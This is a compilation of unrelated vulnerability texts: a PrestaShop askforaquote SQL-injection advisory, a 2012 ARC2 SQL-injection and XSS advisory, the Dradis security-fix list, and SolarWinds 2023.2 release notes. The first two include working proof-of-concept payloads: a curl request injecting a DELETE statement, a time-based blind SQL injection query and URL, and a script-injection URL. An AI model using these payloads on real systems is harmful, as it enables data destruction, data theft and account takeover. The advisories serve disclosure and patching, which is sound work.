SQL injection vulnerability found in PrestaShop askforaquote v.5.4.2 and before allow a remote attacker to gain privileges via the QuotesProduct::deleteProduct component.

In the module “Ask for a Quote - Convert to order, messaging system” (askforaquote) for PrestaShop, an anonymous user can perform SQL injection before 5.4.3. Release 5.4.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-27843
*   **Published at**: 2023-04-25
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: askforaquote
*   **Impacted release**: < 5.4.3
*   **Product author**: Presta FABRIQUE
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 5.4.2, a sensitive SQL call in class QuotesProduct::deleteProduct() can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted “item\_id” variable.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Proof of concept**

    curl -v -X POST -d 'action=delete_from_cart&item_id=2_9%3Bdelete+from+0test+where+1%23' 'https://preprod.XXXXX/module/askforaquote/QuotesCart'
    

**Patch**

    --- v5.4.1/modules/askforaquote/classes/QuotesProduct.php
    +++ v5.4.2/modules/askforaquote/classes/QuotesProduct.php
    @@ -160,9 +160,9 @@ class QuotesProductCart extends ObjectMo
             $row = Db::getInstance()->getRow(
                 'SELECT qp.`quantity`, qp.`id_product_attribute`
                 FROM `' . _DB_PREFIX_ . 'quotes_product` qp
    -            WHERE qp.`id_product` = ' . pSQL($id_product) . '
    +            WHERE qp.`id_product` = ' . (int) $id_product . '
                 AND qp.`id_quote` LIKE "' . pSQL($id_quote) . '"
    -            AND qp.`id_product_attribute` = ' . pSQL($id_product_attribute)
    +            AND qp.`id_product_attribute` = ' . (int) $id_product_attribute
             );
    @@ -211,16 +211,16 @@ class QuotesProductCart extends ObjectMo
                     }
                 }
     
    -            if ((int)$current_qty < 0) {
    +            if ((int) $current_qty < 0) {
                     return $this->deleteProduct($id_product, $row['id_product_attribute']);
                 }
     
    -            //update current product in cart
    +            // update current product in cart
                 $update = Db::getInstance()->execute(
                     'UPDATE `' . _DB_PREFIX_ . 'quotes_product`
    -                SET `quantity` = ' . pSQL($current_qty) . ', `date_upd` = "' . pSQL(date('Y-m-d H:i:s', time())) . '"
    -                WHERE `id_product` = ' . pSQL($id_product) . ' AND `id_quote` LIKE "' . pSQL($id_quote) .
    -                '" AND `id_product_attribute` = ' . pSQL($id_product_attribute) . '
    +                SET `quantity` = ' . (int) $current_qty . ', `date_upd` = "' . pSQL(date('Y-m-d H:i:s', time())) . '"
    +                WHERE `id_product` = ' . (int) $id_product . ' AND `id_quote` LIKE "' . pSQL($id_quote) .
    +                '" AND `id_product_attribute` = ' . (int) $id_product_attribute . '
                     LIMIT 1'
                 );
    @@ -543,15 +542,15 @@ class QuotesProductCart extends ObjectMo
             /* Product deletion */
             $result = Db::getInstance()->execute(
                 'DELETE FROM `' . _DB_PREFIX_ . 'quotes_product`
    -            WHERE `id_product` = ' . pSQL($id_product) . '
    +            WHERE `id_product` = ' . (int) $id_product . '
                 AND `id_quote` LIKE "' . pSQL($this->id_quote) . '"
    -            AND `id_product_attribute` = ' . pSQL($id_product_attribute)
    +            AND `id_product_attribute` = ' . (int) $id_product_attribute
             );
     
             if ($result) {
                 return true;
             }
            //$this->update(true);
     
             return false;
         }
    

**Other recommandations**

*   It’s recommended to upgrade the module beyond 5.4.2.
*   Upgrade PrestaShop beyond 1.7.8.8 (and 8.0.1) to disable multiquery executions (separated by “;”).
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-10-09

Issue discovered during a code review by 202 ecommerce and Touchweb

2023-02-12

Request a CVE ID

2023-02-28

Contact the author

2023-03-01

The author confirm the issue

2023-03-17

Propose 30 days before disclosure

2023-03-19

The author confirm a fix release in progress

2023-03-22

The author published the release 5.4.2

2023-04-25

Publication of this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

CVE-2023-27843: [CVE-2023-27843] Improper neutralization of a SQL parameter in askforaquote module for PrestaShop

ARC (aka ARC2) through 2011-12-01 allows reflected XSS via the end_point.php query parameter in an output=htmltab action.

November 22, 2012 at 11:34 am - Filed under Hacks - 1408 words, reading time ~4 minutes - Permalink - Comments

Simone "negator" Onofri and Luca "beinux3" Napolitano found multiple issues in ARC2, providing RDF and SPARQL functionalities to PHP applications and working with MySQL as backend. Found vulnerabilities include SQL Injection and XSS.

ARC v2011-12-01 Multiple vulnerabilities

 Name              ARC2 v2011-12-01 Multiple vulnerabilities
 Systems Affected  ARC2 v2011-12-01
 Severity          High
 Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 Vendor            https://github.com/semsol/arc2
 Advisory          http://www.ush.it/team/negator/hack-arc\_2011-12-01/adv.txt
 Author            Simone "negator" Onofri, Luca "beinux3" Napolitano
 Date              20121123

I. BACKGROUND

ARC is a flexible RDF system for semantic web and PHP practitioners. 
It's free, open-source, easy to use, and runs in most web server 
environments.

II. DESCRIPTION

ARC version v2011-12-01 and lower is affected by Blind SQL Injection and
Cross Site Scripting vulnerabilities, in particular the SPARQL+ 
Endpoint.

III. ANALYSIS

Summary:
       A) Blind SQL Injection (SQLI) Vulnerability 
       B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in ARC version v2011-12-01.

ARC stores triples into a mySQL database and uses a translator from 
SPARQL and SQL. To improve debugging of the application the developer 
has included comments that contain the query string value. It's possible
to Inject SQL commands on these comments if data passed is into a SPARQL
WHERE clause.

In the "getTriplePatternSQL()" function, "ARC2\_StoreSelectQueryHandler
.php" file, the query sent to MySQL is automatically debugged (without 
the ability to conditionally disable such feature) plugging comments 
containing the pattern's "S P O" (Subject, Predicate, Object; the 
semantic web triple concept) values.

SPARQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PREFIX iam: <http://x>
SELECT \* WHERE {
   ?user iam:user "lol\*/ OR (SELECT sleep(5))=1--" . 
}
LIMIT 100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Actual MySQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

SELECT
  T\_0\_0\_0.s AS \`user\`, 
    T\_0\_0\_0.s\_type AS \`user type\`
FROM arc\_tests\_triple T\_0\_0\_0
WHERE (T\_0\_0\_0.p = 0) /\*FIX-IT http://xuser \*/
  AND (T\_0\_0\_0.o = 0) /\*FIX-IT lol\*/ OR (SELECT sleep(5))=1-- \*/
LIMIT 0,100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

What follows is a demo exploitation of the SPARQL Endpoint.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$query = 'PREFIX iam: <http://x>
 SELECT \* WHERE {
  ?user iam:user "lol\*/ OR (SELECT sleep(5))=1--".?password iam:hasPassw
  ord "password" .
 } LIMIT 100';
$store->setUp();
$store->query($query, 'rows')

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE statements (tautology).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end\_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx
>%0D%0ASELECT+\*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol\*%2F+OR+%28SELE
CT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&sho
w\_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Blind SQL Injection is: High 10/10, vector 
(AV:N/AC:L/Au:N/C:C/I:C/A:C).

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in ARC version 
v2011-12-01 endpoint function.

The GET variable "query" is reflected in page without proper encoding 
when the "output" option is set to "htmltab".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

<div class="results">
 Could not properly handle "<script src=/lol.it/x><script>" in 
 ARC2\_SPARQLPlusParser
</div>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end\_point.php?query=<script+src%3D%2Flol.it%2Fx><
script>&output=htmltab&jsonp=&key=&show\_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10, 
vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).

IV. DETECTION

ARC2 v2011-12-01 and possibly earlier versions are vulnerable.

V. WORKAROUND

Update ARC2 to the latest release or manually fix the "ARC2\_StoreEndpoin
t.php" and other files as described by the commit ID 0a39922edaf6a72c5af
60aaeaff7bc4e92a6d342.

https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342

VI. VENDOR RESPONSE

Issues fixed in GIT commit 0a39922.
 
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned:
 - The name CVE-2012-5872 to Blind SQL Injection Vulnerability. 
 - The name CVE-2012-5873 to Reflected Cross Site Scripting 
   Vulnerability.

This is a candidate for inclusion in the CVE list http://cve.mitre.org, 
which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

20121110 Bug discovered
20121110 Vendor contacted
20121111 Vendor responded
20121111 Vendor fixed SQLI
20121115 Vendor fixed XSS
20121115 Advisory release scheduled for 20121123
20121123 Advisory released

IX. REFERENCES

Well you know what SQLi and XSS are, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this
vulnerability.

Luca "beinux3" Napolitano is credited for the discovery of this
vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Luca "beinux3" Napolitano
web site:http://www.network-tsunami.com/
mail: beinux3 AT gmail DOT com

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2012 

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, 
this information.

CVE-2012-5873: ush.it - a beautiful place

Dradis before 4.8.0 allows persistent XSS by authenticated author users, related to avatars.

This page lists all security vulnerabilities fixed in released versions of **Dradis**. Each vulnerability is given a security impact rating by the Dradis core team - please note that this rating may vary from platform to platform. We also list the versions of **Dradis** the flaw is known to affect, and where a flaw has not been verified list the version with a question mark.

Please send comments or corrections for these vulnerabilities to: **security\[ {at} \]dradisframework{ \[dot\] }org**

**Fixed in Dradis 4.8.0****medium: Authenticated (author) persistent cross-site scripting**

Insufficient validation around avatars resulted in arbitrary JavaScript code execution.

Affects: Pro: 4.7.0 and possibly older versions of Dradis.

**Fixed in Dradis 4.5.0****medium: Authenticated (author) broken access control: read access to issue content**

An author can read issue content when they are not authorized to access it.

Affects: CE: 4.4.0, Pro: 4.4.1 and possibly older versions of Dradis.

**Fixed in Dradis 4.3.0****Low: Password reset token can be reused in a 5-minute window**

The password reset token can be reused in a 5-minute window.

Affects: Pro: 4.2.0 and possibly older versions of Dradis.

Credit: Goktug Serez

**Fixed in Dradis 4.2.0****low: Authenticated author broken access control: read access to screenshots**

An author can access screenshots from another project.

Affects: CE: 4.1.0, Pro: 4.1.2 and possibly older versions of Dradis.

**Fixed in Dradis 4.1.2****high: Authenticated (author) path traversal vulnerability**

An author can gain authorized access.

Affects: CE: 4.1.0, Pro: 4.1.1 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.1.0****medium: Authenticated (author) broken access control: read access to issue content**

An author can read issue content when they are not authorized to access it.

Affects: CE: 4.0.0, Pro: 4.0.0 and possibly older versions of Dradis.

Credit: Kristian Varnai

**Fixed in Dradis 4.0.0****medium: Authenticated (contributor) information disclosure**

After a contributor had been assigned Gateway access to a project by an admin user they may retain access to the project after the projects team has been changed.

Affects: Pro: 3.12.2 and possibly older versions of Dradis when using the Gateway addon.

**Fixed in Dradis 3.11****medium: Authenticated (admin) persistent cross-site scripting**

Insufficient validation around custom fields resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

Credit: Michelle Flanagan

**Fixed in Dradis 3.10.1****medium: Authenticated (author) persistent cross-site scripting**

Insufficient validation around avatars resulted in arbitrary JavaScript code execution.

Affects: CE: 3.15, Pro: 3.5.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.9.1****high: Authenticated (author) information disclosure**

An author who is disabled by admins may continue to use the API.

Affects: Pro: 3.5.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.7.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Comment textareas input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.16, Pro: 3.6.0 and possibly older versions of Dradis.

Credit: Erik Cabetas

**low: Authenticated (admin) persistent cross-site scripting**

Insufficient output encoding around the Methodology templates resulted in arbitrary JavaScript code execution.

Affects: Pro 3.6.0 and possibly older versions of Dradis.

**Fixed in Dradis 3.6.0****high: Authenticated (author) information disclosure**

An author with an active session who is disabled by admins may continue to operate within the application

Affects: Pro 3.5.1 and possibly older versions of Dradis.

**medium: Authenticated (admin) data modification**

An admin can update another user's comment by sending a custom request.

Affects: Pro 3.5.0 and possibly older versions of Dradis.

Credit: Security Compass

**Fixed in Dradis 3.5.0****high: Authenticated (author) information disclosure**

An author without permission on a project may obtain info from that project using the API.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

Credit: Bastian Faure & Florian Nivette

**medium: Authenticated (author) information disclosure**

Mentioning a user in a comment, which does not have access to the project, could result in disclosure of content from future comments in the same thread.

Affects: Pro 3.4.1 and possibly older versions of Dradis.

**Fixed in Dradis 3.4.1****high: Authenticated (author) path traversal vulnerability**

Uploading a malicious zip file it is possible to place files in undesired locations on the filesystem.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

Credit: Props go to Emil Sågfors.

**medium: Authenticated (author) information disclosure**

Information from other projects could be disclosed to other users in the system that happened to be using the application concurrently.

Affects: CE 3.14, Pro 3.4 and possibly older versions of Dradis.

**low: Authenticated (admin) SQL Injection**

A SQL injection vector exploitable by administrator accounts only was identified affecting the Contributors module.

Affects: Pro: 3.4 to 3.2.

**Fixed in Dradis 3.2.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around Evidence title resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**medium: Authenticated persistent cross-site scripting**

Inline display of some attachments resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.2 and possibly older versions of Dradis.

Credit: Props go to an anonymous Dradis user.

**Fixed in Dradis 3.11.1****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.11, Pro: 3.1.1 and possibly older versions of Dradis.

Credit: Props go to Ohji Kashiwazaki and Sabina Rzeźwicka.

CVE-2019-5925

**Fixed in Dradis 3.10.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the Textile textarea input resulted in arbitrary JavaScript code execution.

Affects: CE: 3.9, Pro: 2.9 and possibly older versions of Dradis.

Credit: Props go to Robert Diepeveen

**Fixed in Dradis 3.6.0****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the revision history module resulted in arbitrary JavaScript code execution.

Affects: CE: 3.x, Pro: 2.X and possibly older versions of Dradis.

Credit: Props go to Marly Wilson

**Fixed in Dradis 3.1.0.rc2****medium: Authenticated persistent cross-site scripting**

Insufficient output encoding around the node labels resulted in arbitrary JavaScript code execution.

Affects: 3.1.0.rc1 and possibly older versions of Dradis.

Credit: Props go to Mahmoud Reda

**Fixed in Dradis 2.5.2****high: Unauthenticated reflected cross-site scripting**

Insufficient output encoding could result in arbitrary JavaScript code being executed if a specially crafted file was uploaded by an authenticated user.

Affects: 2.5.1, 2.5.0 and possibly older versions of Dradis.

Credit: Props go to Russ McRee for identifying this issue.

CVE not assigned yet

**Fixed in Dradis 2.0.1****high: Missing authentication**

The authentication filter was found to be missing in two components of the server module (notes and configuration).

This was fixed in revision 598

Affects: 2.0.0

CVE-2009-0670 (candidate)

CVE-2023-31223: Security Reports | Dradis Framework

The SolarWinds Platform was susceptible to the Exposure of Sensitive Information Vulnerability. This vulnerability allows users to access Orion.WebCommunityStrings SWIS schema object and obtain sensitive information.

Release date: April 18, 2023

These release notes describe the new features, improvements, and fixed issues in SolarWinds Platform 2023.2. They also provide information about upgrades and describe workarounds for known issues.

Learn more

*   For information on latest hotfixes, see SolarWinds Platform Hotfixes.
*   For release notes for previous SolarWinds Platform versions, see Previous Version documentation.
*   For information about requirements, see SolarWinds Platform 2023.2 System Requirements.
*   For information about working with the SolarWinds Platform, see the SolarWinds Platform Administrator Guide.

**New features and improvements in SolarWinds Platform**

Return to top

SolarWinds Platform 2023.2 offers the following improvements compared to previous releases of SolarWinds Platform.

*   Security improvements for external alert actions. Only users with server admin rights are able to create new external actions. See Approve alert actions executing a script.
    
*   SMTP authentication improvements
    
*   SSH security improvements
    

**Other improvements**

*   SolarWinds Platform Agent now supports RHEL 9.0.
    
*   Credential API now supports SAM.
    

**New customer installation**

Return to top

For information about installing SolarWinds Platform, see SolarWinds Installer.

**How to upgrade**

Use the SolarWinds Installer to upgrade your entire SolarWinds Platform deployment (all SolarWinds Platform products and any scalability engines) to the current versions.

You must be on Orion Platform 2020.2.1 or later to upgrade to SolarWinds Platform 2023.2. If you are on Orion Platform 2020.2 or earlier, first upgrade to 2020.2.6 and then upgrade to 2023.2.

**Before you upgrade from 2020.2.x**

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Platform 2022.3 or later, make sure the database user you use to connect to your SQL Server has the **db create** privilege. **Without this privilege, the upgrade will not complete.**
    
*   The legacy syslog and traps functionality has been retired and replaced with new functionality called SolarWinds Log Viewer, which can be upgraded to Log Analyzer for additional capabilities. Current rules and history will automatically be migrated to the new logging functionality (SolarWinds Log Viewer or Log Analyzer). The functionality of SolarWinds Log Viewer and Log Analyzer has been improved to more closely match legacy functionality. See LA 2022.3 release notes for details.
    
    If you built syslog and trap alerts using custom SQL queries, they will not function after upgrading to 2022.3 or later. SolarWinds recommends you rewrite the alerts using SWQL (Orion.OLM entities) or using the alerting functionality built into Log Viewer/Log Analyzer.
    
*   Some upgrade situations from the Orion Platform to the SolarWinds Platform are not supported and the installer will stop the upgrade automatically.
    *   If you have a SQL Server older than 2016.
    *   If you have an Orion Platform product version 2020.2 or earlier.

**Fixed issues**

Return to top

SolarWinds Platform 2023.2 fixes the following issues.

 

Case Number

Description

1279130, 1281943,1287850,1290108, 1291149, 1301934, 1302724, 1306120, 1309026

The issues with saving the configuration archive on a network share were addressed.

1286152, 1288976, 1289910, 1290594, 1291107, 1297401, 1307087

The issue where date and time in custom reports did not match the format specified in Time Period was addressed.

1257590, 1280347

The issue where database maintenance was failing after the upgrade was addressed.

1121180

The issues with Azure Cloud Details views were addressed.

1232029

Removed SolarWinds Platform Agent plugins are marked for uninstallation after the upgrade.

1289446

The issue where SolarWinds Administration Service read and wrote the package type to an incorrect registry path was addressed.

1272370, 1273749

The issue where importing alerts with SQL macro variables was blocked for Admin users was addressed.

842639

The issue where time zones of SQL server and SolarWinds Platform polling engines showed a warning even when the zones were the same was addressed.

1052957, 1240424, 1245960, 1246538, 1256606, 1257671, 1266763, 1276328, 1267382, 1279002, 1280926, 1281291, 1283928, 1288216, 1290612, 1291755, 1295777, 1296218, 1297821, 1297859

SolarWinds Information Service performance issues when users without admin rights use PerfStack were addressed.

1270128

The issue where the Configuration Wizard failed when configuring the website because of an applicationHost.config error was addressed.

894237

The issue where Global search could not be disabled on some pages was addressed.

1278031

The issue where users could not set up new alerts using DateTime was addressed.

1229785, 1244480, 1274324

The issue where manually created connections on Maps only showed when the Auto-Generated connection box was selected was addressed.

1264223, 1279159

The issue where scalability engines could be upgraded to the version installed on the main polling engine when upgrades for the main polling engine were available was addressed.

N/A

The issue where the name of sender was not specified for some out-of-the-box alerts was addressed.

1125893, 1220248, 1239230, 1244512, 1249564, 1251466, 1254246, 1258643, 1258669, 1260390, 1261995, 1262474, 1264367, 1265533

The partition management during the Database Maintenance was optimized.

The issue where installation/upgrade failed because of a locked file was addressed.

1241480

The issue where the send trap alert action stops working after the upgrade from 2020.2.6 was addressed.

1236663, 1236783, 1241870, 1242442, 1244793, 1249353, 1251317, 1273624

The issue when attempting to add accounts was addressed.

1207061

The installation error while running the centralized upgrade was addressed.

1249722

The issues with the "less than X objects meet the condition" condition in alerts were addressed.

1245612, 1248898

The issues with the Configuration Wizard launching automatically was addressed.

1244008

The issue where custom charts changed behavior was addressed.

1229115

The issue where AmsProxy logs stopped logging on log level change was addressed.

1237514, 1243831, 1245680, 1274269, 1289216

The issue where the node last boot was displayed using UTC was addressed. Last boot is displayed using the local time.

1154578

The issue with loading Subcategory when creating a ServiceNow incident was addressed.

826160, 864527, 873077

The issue where no error message was displayed when the upgrade failed was addressed.

1239689, 1279354

The issue where the Permission Checker fails on upgrade from 2020.2.6 for additional polling engines was addressed.

1228441

The issue where the category was not parsed correctly in All Nodes widgets was addressed.

1234160, 1254686

The issue where proportional widgets do not parse statuses was addressed.

1205283

The issue where Windows Agents generated high CPU usage was addressed.

1228673

The issue where the installation fails if there is another suspended MSI installation in the system was addressed.

1214950

The issue where latency between polling engines was incorrectly indicated on the main server was addressed.

1216266

The issue with time zones of SQL server and the main polling engine was addressed.

1187919, 1209102

The issue with Fortinet Fortigate 101E incorrectly polling IP addresses was addressed.

1202271, 1246753, 1256631, 1259934, 1263843, 1282054, 1289795

The issue where scheduled unmanaging issues caused false positive alerts was addressed.

1217121, 1291663

The issue where upgrade from 2020.2.6 fails in the Circuit wizard when the bound HTTPS certificate is not available on the system anymore was addressed.

1194008

The issue where administrators could update the database with queries in the Add/Edit Report wizard was addressed.

1186572, 1288230

The issue where users could not save changed rows in Manage Entities was addressed.

1154256

The issue where users could not change the SNMPv3 credentials set for a node was addressed.

930171, 990401, 1048906, 1054670, 1095761, 1102507, 1208626

The issues with obsolete records in Cortex documents were addressed.

1163369

The issues with assigning a new dashboard as the default summary view were addressed.

1150632

The issue where the testing credentials for the execute external program alert action triggered the action instead of only validating the credentials was addressed.

1106632

The issues with using SQL/SWQL variables in the SMS alert action were addressed.

1128730

The issue where the Active Diagnostics test "Check Engines and OrionServers integrity" was case-sensitive was addressed.

1198603, 1204150, 1226617, 1228488, 1269783, 1278674, 1279332

The issue where the PerfStack real-time polling ignored account permissions was addressed.

1088944

The issue where volume charts behave differently for administrators and non-administrators was addressed.

318702, 874297, 932513, 1076268, 1200393

The issue where audit events for alert suppression showed time in UTC was addressed.

773793, 916997, 1092088

The issue where High Availability applications and components are not licensed was addressed.

631312, 807280, 817116, 1048102, 1051103, 1133802

The issues with latest baseline graphs were addressed.

**CVEs**

SolarWinds would like to thank our Security Researchers below for reporting on the issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-47509

SolarWinds Platform Incorrect Input Neutralization Vulnerability

The SolarWinds Platform was susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject HTML.

4.3 Medium

Juampa Rodriguez (@UnD3sc0n0c1d0)

CVE-2022-36963

SolarWinds Platform Command Injection Vulnerability

The SolarWinds Platform was susceptible to the Command Injection Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform admin account to execute arbitrary commands.

8.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2022-47505

SolarWinds Platform Local Privilege Escalation Vulnerability

The SolarWinds Platform was susceptible to the Local Privilege Escalation Vulnerability. This vulnerability allows a local adversary with a valid system user account to escalate local privileges.

7.8 High

Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

CVE-2023-23839

SolarWinds Platform Exposure of Sensitive Information Vulnerability

The SolarWinds Platform was susceptible to the Exposure of Sensitive Information Vulnerability. This vulnerability allows users to access Orion.WebCommunityStrings SWIS schema object and obtain sensitive information.

6.8 Medium

 

**Known issues**

Return to top

 

1310500

Configuration Wizard stops progressing

**Issue**: When you upgrade to 2023.2 RC1, the Configuration Wizard stops progressing, usually at 0-5% complete.

**Workaround**:

1.  Cancel the Configuration Wizard, for example by ending it in the Task Manager.
2.  Find INSTALL_PATH]\SWNetPerfMon.DB, for example in C:\Program Files (x86)\SolarWinds\Orion\SWNetPerfMon.DB, and open it for editing.
3.  Remove all empty lines from the bottom of the file and save your changes.
4.  Run the Configuration Wizard.

**End of life**

Return to top

For modules based on Orion Platform 2020.2.6 and earlier, SolarWinds is announcing future end-of-life plans for your convenience. As always, SolarWinds recommends you upgrade to the latest version of your products at your earliest convenience.

   

Version

EOL Announcements

EOE Effective Dates

EOL Effective Dates

2020.2.6

**April 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.6 should begin transitioning to the latest version of SolarWinds Platform.

**May 18, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.6 will no longer be actively supported by SolarWinds.

**May 18, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.6

2020.2.5

**January 18, 2023**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.5 should begin transitioning to the latest version of SolarWinds Platform.

**February 17, 2023**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.5 will no longer be actively supported by SolarWinds.

**February 17, 2024**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.5.

2020.2.4

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.4 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.4 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.4.

2020.2.1

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2.1 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2.1 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.1.

2020.2

**October 19, 2022**: End-of-Life (EoL) announcement – Customers on Orion Platform 2020.2 should begin transitioning to the latest version of SolarWinds Platform.

**November 18, 2022**: End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for Orion Platform 2020.2 will no longer be actively supported by SolarWinds.

**November 18, 2023**: End-of-Life (EoL) – SolarWinds will no longer provide technical support for Orion Platform 2020.2.

See the End of Life Policy for information about SolarWinds product lifecycle phases. For supported versions and EoL announcements for all SolarWinds products, see Currently supported software versions.

**End of support**

Return to top

This version of SolarWinds Platform no longer supports the following platforms and features.

 

Type

Details

Browser support

All versions of Internet Explorer are no longer supported.

**Deprecation notices**

Return to top

This version of SolarWinds Platform deprecates the following platforms and features.

Deprecated platforms and features are still supported in the current release. However, they will be unsupported in a future release. Plan on upgrading deprecated platforms, and avoid using deprecated features. 

 

Type

Details

Network Atlas

Network Atlas is deprecated as of Orion Platform 2020.2. It is still available and supported in the current release, but will be removed in a future release. Deprecation is an indication that you should avoid expanded use of this feature and formulate a plan to discontinue using the feature. SolarWinds recommends that you start using SolarWinds Platform Maps in the SolarWinds Platform Web Console to display maps of physical and logical relationships between entities monitored by the SolarWinds Platform products you have installed.

Port 17778

SWIS REST Endpoint on port 17778 is deprecated as of 2023.1 and will be replaced with port 17774 in a future release. SolarWinds recommends that you start migrating SWIS REST Endpoint to port 17774.

**Legal notices**

Return to top

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

